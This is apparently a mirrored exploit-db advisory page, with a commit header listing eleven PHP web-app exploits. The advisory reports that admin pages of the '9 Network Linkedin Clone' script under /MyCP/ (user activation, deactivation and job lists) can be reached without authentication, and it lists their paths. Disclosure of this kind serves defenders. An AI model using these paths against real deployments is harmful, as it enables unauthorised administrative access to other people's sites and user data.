exploit-db-mirror/platforms/php/webapps/41060.txt
Offensive Security b086c09178 DB: 2017-01-16
11 new exploits

9 Network Linkedin Clone Script - Improper Access Restrictions
Article Directory Script Seo 3.2 - Improper Access Restrictions
e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass
MC Smart Shop Script - SQL Injection
MC Buy and Sell Cars Script 1.1 - SQL Injection
MC Yellow Pages Script - SQL Injection
MC Real Estate Pro Script - Improper Access Restrictions
MC Hosting Coupons Script - Cross-Site Request Forgery
MC Inventory Manager Script - Multiple Vulnerabilities
MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions
MC Documentation Creator Script - SQL Injection
2017-01-16 05:01:17 +00:00

23 lines
No EOL
858 B
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# # # # #
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://theninehertz.com
# Script Name: 9 network Linkedin Clone Classified Ads Script
# Script Version: v1.0
# Script Buy Now: http://theninehertz.com/linkedin-clone
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/MyCP/welcome.php
# http://localhost/[PATH]/MyCP/industry-list.php
# http://localhost/[PATH]/MyCP/active_user.php
# http://localhost/[PATH]/MyCP/deactive_user.php
# http://localhost/[PATH]/MyCP/unverified_user.php
# http://localhost/[PATH]/MyCP/job-list.php
# http://localhost/[PATH]/MyCP/job-pack.php
# Vs.......
# # # # #